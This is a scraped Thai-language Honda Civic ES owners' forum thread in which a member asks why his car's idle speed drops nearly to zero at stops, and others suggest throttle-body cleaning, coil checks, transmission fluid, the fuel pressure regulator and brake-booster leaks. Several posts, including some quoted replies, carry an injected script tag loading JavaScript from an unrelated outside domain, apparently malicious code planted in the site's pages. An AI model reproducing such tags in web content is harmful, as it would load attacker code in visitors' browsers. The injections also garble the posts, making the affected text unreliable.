ตอบ
iampou

ชื่อเล่น: ปู

เข้าร่วม: 03 สิงหา 2013
ตอบ: 18

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 13

ที่อยู่: ถ.วัดลาดปลาดุก ต.พิมลราช อ.บางบัวทอง จ.นนทบุรี 11110
ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
ศุกร์, 7 กุมภา 2014 13:23 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
สวัสดีครับ เพื่อนๆ พี่ๆ น้องๆ
ผมเองก็เข้ามาเป็นสมาชิกมาสักระยะแล้ว
เข้ามาอ่านหาความรู้ แต่ตัวผมเองก็ไม่ได้มีความรู้เรื่องเครื่องยนต์
เลยไม่กล้าตอบหรือแสดงความคิดเห็น ซึ่งผมใช้ es 03 at vtec อยู่
มีปัญหาเหมือนกัน แต่ยังไม่เห็นท่านไหนอาการเหมือนผมเลย
ตอนได้รถมา ก็เปลี่ยนของเหลวใหม่ทั้งหมด สาพานไทม์มิ่ง ลูกรอก ใหม่หมด

เรื่องรอบเดินเบา แต่ไม่เหมือนท่านอื่นๆ ครับ รถผมที่ได้มายังไม่ได้ติดแก๊ส
ตอนสตาร์ทใหม่ๆ ขับไปไม่มีปัญหาอะไร แต่ขับไปสักพัก เวลาหยุดรถ รถติดหรือไฟแดง
รอบเครื่องตกมาเกือบแตะ 0 แต่ก็ไม่ดับ รู้สึกสั่นเล็กน้อย หามาหลายอู่ ยังแก้ไม่หาย

มอเตอร์รอบเดินเบา ก็เปลี่ยนแล้ว ตั้งวาล์วก็ตั้งแล้ว เปลี่ยนหัวเทียนแล้ว
เสียค่าใช้จ่ายกับอาการนี้ไปหลายครับ
มีท่านใดพอทราบว่าเกิดจากอะไรบ้างหรือเปล่าครับ
พอดีเจอกระทู้ที่ไปทำที่ R-Motor คิดว่า เลยคิดว่าน่าจะเอารถไปให้ทาง อู่นี้ลองเช็คทำดู
เพื่อนสมาชิกในคลับคิดว่าอย่างไรครับ
ได้รับคำขอบคุณจาก: c_nirun  qq 
boymac

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 906

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 996
ให้คำขอบคุณ: 231

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 7 กุมภา 2014 13:49 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
ล้างปีกฝีเสื้อยังครับ และอีกจุดลองให้ช่าง test คอยน์จุดระเบิดว่ามาเต็มสูบหรือป่าว (ถ้ามีตัวไหนตัวหนึ่งมีปัญหาก็มีอาการได้) หรือ ให้ทางอู่เอาเครื่องมือเช็ค Code ดูด้วยก็จะเห็นว่าค่าที่ได้ออกมาปกติหรือป่าวลองดูครับ
ได้รับคำขอบคุณจาก: iampou  qq 
iampou

น้องใหม่
น้องใหม่

ที่อยู่: ถ.วัดลาดปลาดุก ต.พิมลราช อ.บางบัวทอง จ.นนทบุรี 11110
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
ศุกร์, 7 กุมภา 2014 14:01 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
boymac พิมพ์ว่า:
ล้างปีกฝีเสื้อยังครับ และอีกจุดลองให้ช่าง test คอยน์จุดระเบิดว่ามาเต็มสูบหรือป่าว (ถ้ามีตัวไหนตัวหนึ่งมีปัญหาก็มีอาการได้) หรือ ให้ทางอู่เอาเครื่องมือเช็ค Code ดูด้วยก็จะเห็นว่าค่าที่ได้ออกมาปกติหรือป่าวลองดูครับ

ล้างแล้วครับ คุณ boymac ลืมบอกไปครับ ขอโทษด้วยครับ
อู่ล่าสุด เขาก็บอกว่า ลองเปลี่ยนคอยน์จุด โดยใช้อะไหล่ที่เขามี
ลองเปลี่ยนปีกผีเสื้อ โดยใช้อะไหล่ที่เขามี ก็ไม่หายครับ
แต่ก็ยังขับใช้อยู่ได้ครับ แต่กลัววันไหนมันจะใช้งานไม่ได้เลย
petershine

ชื่อเล่น: พิชญ์

เข้าร่วม: 17 มกรา 2014
ตอบ: 137

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 225
ให้คำขอบคุณ: 53

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 7 กุมภา 2014 15:24 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
ลองสังเกตุดูว่ามีจังหวะใหนที่รอบเดินเบาตกบ้างก่อนนะครับ
.
ของผมก็คล้ายๆกัน วิ่งมาชะลอหรือจอดรอบตกแต่ไม่ดับ จอดติดไฟเข้าเกียร์Dรอบไม่นิ่งตกๆวูบๆ ไล่ดู
ก็มาพบว่าน้ำมันเกียร์ออโต้น้อยไปหน่อย เลยลองเติมเพิ่มดู อาการที่ว่าก็หายไปจนแทบไม่เจอ อาจจะ
มีบ้างที่มาแรงๆแล้วหยุดกะทันหันรอบวูบแต่ไม่เยอะ ลองดูนะครับเผื่อเป็นเหมือนผม
.
ปล.ตอนนี้ผมกำลังเล็ง "สวิทซ์คลิ๊กดาวน์" อยู่ว่ามันทำงานยังไงอาจส่งผลต่อรอบเครื่องในจังหวะใช้ความเร็ว 
ได้รับคำขอบคุณจาก: iampou  qq 
domziia

ชื่อเล่น: เจต

เข้าร่วม: 24 กุมภา 2012
ตอบ: 1246

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1167
ให้คำขอบคุณ: 3865

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 7 กุมภา 2014 15:29 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
ผมล้างลิ้นปีกผีเสื้ออย่างเดียวหายเลยคับ 300
ได้รับคำขอบคุณจาก: iampou 
iampou

น้องใหม่
น้องใหม่

ศุกร์, 7 กุมภา 2014 15:31 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
petershine พิมพ์ว่า:
ลองสังเกตุดูว่ามีจังหวะใหนที่รอบเดินเบาตกบ้างก่อนนะครับ
.
ของผมก็คล้ายๆกัน วิ่งมาชะลอหรือจอดรอบตกแต่ไม่ดับ จอดติดไฟเข้าเกียร์Dรอบไม่นิ่งตกๆวูบๆ ไล่ดู
ก็มาพบว่าน้ำมันเกียร์ออโต้น้อยไปหน่อย เลยลองเติมเพิ่มดู อาการที่ว่าก็หายไปจนแทบไม่เจอ อาจจะ
มีบ้างที่มาแรงๆแล้วหยุดกะทันหันรอบวูบแต่ไม่เยอะ ลองดูนะครับเผื่อเป็นเหมือนผม
.
ปล.ตอนนี้ผมกำลังเล็ง "สวิทซ์คลิ๊กดาวน์" อยู่ว่ามันทำงานยังไงอาจส่งผลต่อรอบเครื่องในจังหวะใช้ความเร็ว 

ผมซื้อมือสองมาครับ ตอนได้รถมาก็เข้าอู่แถวบ้าน เปลี่ยนถ่ายของเหลวทั้งหมด
ก็คิดว่าอู่ น่าจะเติมได้ระดับนะครับ เป็นอู่ทำเฉพาะฮอนด้าครับ
จะเป็นบางทีครับ ตอนที่ขับไปความร้อนได้ที่ครับ ถ้าสตาร์ทใหม่ๆ ขับไปยังไม่ไกล
ยังไม่เป็นครับ ก็จะเป็นจังหวะจอด เหยียบเบรคหยุดครับ เข้าเกียร์ D ครับ
ถ้าตอนที่ตก ถึงดันมาเกียร์ N ก็ยังตกครับ แต่ไม่ดับ งั้น ไว้จะลองให้อู่ลองตรวจดู
ว่าเป็นที่น้ำมันเกียร์น้อยไปหรือเปล่า ขอบคุณ คุณ petershine ครับ
ได้รับคำขอบคุณจาก: c_nirun 
petershine

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 7 กุมภา 2014 15:53 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
ของผมรถปี 01 ก็พึ่งได้มาตอนต้นปี 57 นี้เหมื่อนกันครับ ทำทุกอย่างมาเหมือนกันครับ
ตัวน้ำมันเกียร์ตอนแรกก็ไม่คิดถึงแต่ลองวัดดูมันมีขีดเดียว ก็เลยให้ช่างดูเขาก็ว่าน้อยไปนิด
ก็เลยลองเติมดูน่ะครับ แต่ว่า "ถึงดันมาเกียร์ N ก็ยังตกครับ" อาการนี้ผมคันผมช่วงที่มีปัญหา
มีวูบบ้างแต่น้อยมาก มักจะเป็นตอนใส่ D มากกว่าครับ
.
ปล.อู่พี่อ๊อด(อู่ประจำผมเลย)หรือปล่าวครับ ผมมาใช้ฮอนด้าก็เพราะรู้จักอู่นี่แหละครับ <script src="https://sport32news.com/civicesgroup.js"></
horus

ชื่อเล่น: ต๋อย

เข้าร่วม: 18 เมษา 2013
ตอบ: 1272

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1777
ให้คำขอบคุณ: 1065

สี: ม่วง วินเทจพลัม (RP-32P)
ศุกร์, 7 กุมภา 2014 15:59 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
มาเก็บข้อมูลจร้า "<script src="https://sport32news.com/civicesgroup.js">
iampou

น้องใหม่
น้องใหม่

ศุกร์, 7 กุมภา 2014 16:02 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
ของผมรถปี 01 ก็พึ่งได้มาตอนต้นปี 57 นี้เหมื่อนกันครับ ทำทุกอย่างมาเหมือนกันครับ
ตัวน้ำมันเกียร์ตอนแรกก็ไม่คิดถึงแต่ลองวัดดูมันมีขีดเดียว ก็เลยให้ช่างดูเขาก็ว่าน้อยไปนิด
ก็เลยลองเติมดูน่ะครับ แต่ว่า "ถึงดันมาเกียร์ N ก็ยังตกครับ" อาการนี้ผมคันผมช่วงที่มีปัญหา
มีวูบบ้างแต่น้อยมาก มักจะเป็นตอนใส่ D มากกว่าครับ
.
ปล.อู่พี่อ๊อด(อู่ประจำผมเลย)หรือปล่าวครับ ผมมาใช้ฮอนด้าก็เพราะรู้จักอู่นี่แหละครับ <script src="https://sport32news.com/civicesgroup.js"></

ใช่ อุ๋ first หรือเปล่าครับ ผมก็ไปทำที่นั่นครับ ไว้จะลองวัดดูก่อนว่า ต่ำหรือเปล่าครับ
petershine

ศุกร์, 7 กุมภา 2014 16:08 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
อู่เฟิร์ท์ใช่แล้วครับ พี่อ๊อดกะคุณออย ^^
pannatad

ชื่อเล่น: ปุ๋ย

เข้าร่วม: 19 เมษา 2011
ตอบ: 1900

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1742
ให้คำขอบคุณ: 751

ศุกร์, 7 กุมภา 2014 16:13 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
ลองปิดแอร์แล้ววิ่งดูครับ อาจจะเกิดปัญหาจากแอร์ฉุดรอบก็เป็นได้ ^ ^
iampou

น้องใหม่
น้องใหม่

ศุกร์, 7 กุมภา 2014 16:41 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
pannatad พิมพ์ว่า:
ลองปิดแอร์แล้ววิ่งดูครับ อาจจะเกิดปัญหาจากแอร์ฉุดรอบก็เป็นได้ ^ ^

ปิดแอร์ก็เป็นครับ เลยคิดว่าไม่น่าจะเกี่ยวกับแอร์อะครับ ^^ ขอบคุณครับ คุณ pannatad
tokmun002

ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ศุกร์, 7 กุมภา 2014 19:17 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
เรคกูเรเตอร์ป่าวครับ ที่ควบคุมแรงดันน้ำมัน ผมเคยถามอาการอย่างนี้ที่หัวหน้าช่างของฮอนด้าเค้าบอกมา. แต่รถผมเป็นที่แกนมอเตอร์รอบเดินเบามันฝืดล้างแล้วหายจบเลยครับ
boymac

เข้าร่วม: 25 มิถุนา 2009
ตอบ: 906

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 996
ให้คำขอบคุณ: 231

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 7 กุมภา 2014 19:54 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
.

ช่างอ๊อต อู่ออโต้เฟริส์่ทตรงซอยจันทร์ทองเอี่ยม (ถนนเรียบคลอง) ถ้าที่นี่ผมใช้บริการอยู่ แก้หายทุกอาการที่รถผมเป็นนะ (เพราะผมก็อยู่ในซอยนี้) ทำที่นี้ตลอดๆ ประมาณ 5-6 ปี

Pokko

ชื่อเล่น: หมัด

เข้าร่วม: 05 มกรา 2013
ตอบ: 700

Guru ES
Guru ES

ได้รับคำขอบคุณ: 297
ให้คำขอบคุณ: 164

สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 7 กุมภา 2014 20:42 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
รถผมก้อเป็นอาการนี้เลยครับ แต่ไม่ได้ใช้ในเมือง เลยไม่ค่อยมีปัญหาเท่ไหร่
ยังงัยรอติดตามน่ะครับ

iampou

น้องใหม่
น้องใหม่

ศุกร์, 7 กุมภา 2014 21:55 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
tokmun002 พิมพ์ว่า:
เรคกูเรเตอร์ป่าวครับ ที่ควบคุมแรงดันน้ำมัน ผมเคยถามอาการอย่างนี้ที่หัวหน้าช่างของฮอนด้าเค้าบอกมา. แต่รถผมเป็นที่แกนมอเตอร์รอบเดินเบามันฝืดล้างแล้วหายจบเลยครับ

เรคกูเรเตอร์ ตัวนี้มันอยู่ตรงไหนครับ หน้าตามันเป็นยังไงครับ มีรูปหรือเปล่า
ถ้ามีลงรูปให้ดูหน่อยนะครับ ขอบคุณครับ คุณ tokmun002
iampou

น้องใหม่
น้องใหม่

ศุกร์, 7 กุมภา 2014 21:59 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
boymac พิมพ์ว่า:

.

ช่างอ๊อต อู่ออโต้เฟริส์่ทตรงซอยจันทร์ทองเอี่ยม (ถนนเรียบคลอง) ถ้าที่นี่ผมใช้บริการอยู่ แก้หายทุกอาการที่รถผมเป็นนะ (เพราะผมก็อยู่ในซอยนี้) ทำที่นี้ตลอดๆ ประมาณ 5-6 ปี

ผมก็ทำที่อู่ออโต้เฟริส์ทครับ เปลี่ยนมอเตอร์รอบเดินเบาที่นี่ด้วย ของใหม่เบิกห้างเลย
แต่ไม่หาย ช่างอ๊อดก็ ไม่รู้จะแก้ตรงไหนแล้วครับ ให้แกนั่งไปดูอาการด้วยกัน
แกก็เห็นนะครับ ว่ามันตกแต่มันก็ไม่ดับ สั่นแค่เล็กน้อย ถ้าไม่สังเกตุแทบไม่รู้สึกครับ
ผมก็อยู่บางบัวทอง ก็เลยไปทำที่นี่ แต่ไม่หายก็ต้องหาไปเรื่อยครับ
พอดี ผมทำงานแถวงามวงศ์วาน เห็นมีอู้ R-Motor ที่เพื่อนๆสมาชิกลงไว้ ก็เลยสอบถามดูครับ
tokmun002

ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

เสาร์, 8 กุมภา 2014 22:29 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
iampou พิมพ์ว่า:

เรคกูเรเตอร์ ตัวนี้มันอยู่ตรงไหนครับ หน้าตามันเป็นยังไงครับ มีรูปหรือเปล่า
ถ้ามีลงรูปให้ดูหน่อยนะครับ ขอบคุณครับ คุณ tokmun002

ผมก็ไม่เคยเห็นเหมือนกันครับ. "<script src="https://sport32news.com/civicesgroup.js">
netgame02

ชื่อเล่น: ตอง

เข้าร่วม: 24 กรกฎา 2012
ตอบ: 1689

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 878
ให้คำขอบคุณ: 601

อาทิตย์, 9 กุมภา 2014 09:04 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
แบตเตอรี่ไฟยังดีอยุ่หรือเปล่าคับ แบตเสื่อมก้มีส่วนนะ
sixmund35

เข้าร่วม: 23 ธันวา 2013
ตอบ: 9

น้องใหม่
น้องใหม่

ให้คำขอบคุณ: 7

สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 9 กุมภา 2014 09:43 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
ไม่รู้คำตอบของผมจะช่วยมั้ยนะครับ ผมก็งูๆปลาๆ 

พี่ จขกท เวลารถอยู่เฉยๆละหมุนพวงมาลัยละรอบตกมั้ยครับ?

ถ้าตกนี่ก็อาการเหมือนรถคันเก่าผมเลย (Nissan sentra B13)

เคยคุยช่างมาเหมือนกันครับ เค้าบอกเป็นที่ตัวแวคคั่มอะไรซักอย่าง จะทำงานเอาไว้ชดเชยอากาศอะครับ เช่นเวลาเราเหยียบเบรคเนี่ย หม้อลมเบรคมันจะดูดอากาศไปใช้ เจ้าตัวนี้มันก็จะทำงานเอาอากาศไปช่วย ไม่ให้รอบเครื่องยนต์มันตกเพราะอากาศไม่พอ ดังนั้นเวลาตัวนี้พัง การชดเชยอากาศก็จะน้อยลงทำให้รอบตกคับผม ถ้าผิดถูกยังไงช่วยแก้ด้วยนะคับ "<script src="https://sport32news.com/civicesgroup.js">

Edit : อ้อ อีกอย่าง เรื่องหม้อลมเบรครั่ว ยังไงลองเช็คตรงนี้ด้วยนะครับ
iampou

น้องใหม่
น้องใหม่

อาทิตย์, 9 กุมภา 2014 13:45 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
netgame02 พิมพ์ว่า:
แบตเตอรี่ไฟยังดีอยุ่หรือเปล่าคับ แบตเสื่อมก้มีส่วนนะ

แบตเตอรี่เปลี่ยนใหม่แล้วครับ ตอนแรกก็คิดว่าแบตเสื่อมก็เลยเปลี่ยน แต่ก็ไม่หายครับ ขอบคุณนะครับ คุณ netgame02
iampou

น้องใหม่
น้องใหม่

อาทิตย์, 9 กุมภา 2014 13:52 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
sixmund35 พิมพ์ว่า:
ไม่รู้คำตอบของผมจะช่วยมั้ยนะครับ ผมก็งูๆปลาๆ 

พี่ จขกท เวลารถอยู่เฉยๆละหมุนพวงมาลัยละรอบตกมั้ยครับ?

ถ้าตกนี่ก็อาการเหมือนรถคันเก่าผมเลย (Nissan sentra B13)

เคยคุยช่างมาเหมือนกันครับ เค้าบอกเป็นที่ตัวแวคคั่มอะไรซักอย่าง จะทำงานเอาไว้ชดเชยอากาศอะครับ เช่นเวลาเราเหยียบเบรคเนี่ย หม้อลมเบรคมันจะดูดอากาศไปใช้ เจ้าตัวนี้มันก็จะทำงานเอาอากาศไปช่วย ไม่ให้รอบเครื่องยนต์มันตกเพราะอากาศไม่พอ ดังนั้นเวลาตัวนี้พัง การชดเชยอากาศก็จะน้อยลงทำให้รอบตกคับผม ถ้าผิดถูกยังไงช่วยแก้ด้วยนะคับ "<script src="https://sport32news.com/civicesgroup.js">

Edit : อ้อ อีกอย่าง เรื่องหม้อลมเบรครั่ว ยังไงลองเช็คตรงนี้ด้วยนะครับ

es เรามีแวคคั่มด้วยหรอครับ ใช่ตัวเดียวกับมอเตอร์คุมรอบเดินเบาหรือเปล่าครับ ถ้าใช่ ผมเปลี่ยนตัวใหม่แล้วครับ แพงจัง
เวลาหมุนพวงมาลัย รอบไม่ตกนะครับ
หม้อลมเบรครั่วหรอ อยากให้ช่างเช็คเหมือนกันครับ เคยบอกช่าง แต่เหมือนเขาไม่เช็คให้
เขาใช้สันนิษฐานว่าไม่น่าจะรั่ว บอกเหยียบเบรคก็ไม่เห็นผิดปกติ ผมเลยไม่รู้จะทำยังไง
ว่าต้องหาอู่ที่เขาทำตามคำขอที่เราอยากให้เช็คซะหน่อย  ไม่รู้ว่าอู่ R-Motor โอเคหรือเปล่า
เพราะอยู่ใกล้ๆ ที่ทำงาน เผื่อจะแวบออกไปให้เขาเช็ค อีกอย่างใต้ท้องเห็นมีน้ำมันหยด ให้เช็คทีเดียวเลย "<script src="https://sport32news.com/civicesgroup.js">
ขอบคุณ คุณ sixmund35 ด้วยนะครับ
c_nirun

เข้าร่วม: 11 กุมภา 2013
ตอบ: 63

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 90
ให้คำขอบคุณ: 78

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พฤหัส, 30 ตุลา 2014 10:04 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
พี่ปูครับ อาการหายยังครับ ของผมก็เป็น 
wutdy

ชื่อเล่น: วูดดี้

เข้าร่วม: 13 มกรา 2010
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1250
ให้คำขอบคุณ: 235

พฤหัส, 30 ตุลา 2014 17:30 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
iampou พิมพ์ว่า:

ผมก็ไม่เคยเห็นเหมือนกันครับ. "<script src="https://sport32news.com/civicesgroup.js">

อยู่ตรงปั้มติ๊กครับจะเป็นรูปคล้ายๆ ท่อวนสีเงินตัวเล็กๆ ประมาณ 2 เซ็นครับ เป็นตัวควบคุมแรงดันน้ำมัน
Khachi

เข้าร่วม: 28 พฤษภาคม 2012
ตอบ: 538

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1342
ให้คำขอบคุณ: 4
พุธ, 23 มีนา 2016 18:38 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
หายยังครับเคสนี้...ผมแก้จนปวดตับแล้วเหมือนกัน น้ำมันเป็น  แก๊สนี่มีดับ... (ดับเป็นบางครั้ง)
Pantamitr

ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 24 มีนา 2016 08:54 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
Khachi พิมพ์ว่า:
หายยังครับเคสนี้...ผมแก้จนปวดตับแล้วเหมือนกัน น้ำมันเป็น  แก๊สนี่มีดับ... (ดับเป็นบางครั้ง)

จขกท. คงแก้ได้แล้ว หรือไม่ก็คงขายรถไปแล้วแน่เลย
อาการเป็นไงบ้างละครับ ขอละเอียดๆ ผมสงสัย เพราะผมเป็นทีไร ก็แก้จบได้ทุกที ทำไมท่านอื่นๆ จึงแก้ไม่ตก
Thard

ชื่อเล่น: น้องเติ้ด

เข้าร่วม: 22 กันยา 2015
ตอบ: 792

Guru ES
Guru ES

ได้รับคำขอบคุณ: 181
ให้คำขอบคุณ: 65

สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 24 มีนา 2016 10:22 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
ของผมเริ่มแระ.เมื่อวานเข้าเมืองรถติดอากาศร้อนพอเหยียบเบรคช่วงรถกำลังจะหยุด รอบตกแต่ไม่ดับ
คงต้องรอดูอาการต่อสักพัก.เพราะขับนอกเมืองไม่เป็นไรขั้นต้นสิ้นเดือนว่าจะลองไปตั้งวาวร์ล้างลิ้นปีกดูก่อน
ใครมีอู่แนะนำแถวๆปากเกร็ดบ้างป่าว
qq

เข้าร่วม: 10 กุมภา 2012
ตอบ: 118

ได้รับคำขอบคุณ: 144
ให้คำขอบคุณ: 2652

พฤหัส, 24 มีนา 2016 12:15 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
ผมเคยเปลี่ยนยางรองเบ้าหัวเทียนแล้วหายคับซีนกันน้ำมันมันขาด รองถอดหัวเทียนออกมาดูก่อนก็ใด้ถ้าฉ่ำๆน้ำมันก็น่าจะใช่คับ
Khachi

เข้าร่วม: 28 พฤษภาคม 2012
ตอบ: 538

ได้รับคำขอบคุณ: 1342
ให้คำขอบคุณ: 4
พฤหัส, 24 มีนา 2016 13:32 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
..

แก้ไขล่าสุดโดย เมื่อ จันทร์, 25 เมษา 2016 06:09, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
Pantamitr

ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 24 มีนา 2016 21:32 - รถไม่ได้ติดแก๊ส รอบเดินเบาต่ำ ไม่ดับ
Khachi พิมพ์ว่า:
เครื่อง 1.7 Vtec MT 
อาการรถ

ขับปรกติทุกอย่างยกเว้นเวลาเบาแล้วรอบต่ำ (รอบต่ำกว่า 500)
- อาการรอบตกจนต่ำผิดปรกติ เป็นบางบางครั้งเท่านั้น ไม่ได้เป็นตลอดเวลา
- ส่วนใหญ่เป็นเฉพาะเวลารถวิ่งแล้วถอนเข้าเกียร์ว่าง (รถผม MT)
- ไม่เปิดแอร์ก็ยังมีอาการให้เห็น
- ทดสอบจอดรถกับที่ แล้วเร่ง-เบาๆ (เร่งจนถึง 2500 แล้วปล่อยให้รอบตก) ทดสอบอยู่ประมาณ 5 นาที  ก็ไม่มีอาหารรอบต่ำให้เห็น
- ส่วนใหญ่เป็นหลังจากตอนที่รถออกตัวไปได้ซักพัก หรือหลังที่อุณหภูมิเครื่องหลัง 80 Up
- เป็นทั้งขับน้ำมัน และแก๊ส (ถ้าใช้น้ำมันรอบตกเกือบเหลือ 0 เครื่องสั่น ไม่ดับ แต่ถ้าเป็นแก๊สเวลารอบมันตกเครื่องจะดับไปเลย) 

สิ่งที่ทำมาแล้ว
- ตั้งวาล์ว ล้างปีกผีเสื้อ เปลี้ยนมอเตอร์เดินเบาร์(เซียงกง)  เปลี่ยนคอย์  เปลี่ยนหัวเทียน 

อาการที่ว่ามา มันบ่งชี้ไปทีระบบเดินเบาจริงๆ คือ มันไม่คุมรอบเดินเบาให้คงที่
1. มอเตอร์เดินเบาจากเซียงกง ก็อาจจะไม่ชัวร์ อาจจะมีปัญหามาเหมือนกัน ถ้าให้ชัวร์ควรถอดมาล้าง
http://www.civicesgroup.com/forum/post1817917
2. ปลั๊ก คอยล์จุดระเบิด ก็มีส่วน
3. ถ้ายังไม่หาย ลองดูการ Reset IACV แบบนี้ดูนะครับ http://www.civicesgroup.com/forum/topic64942
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.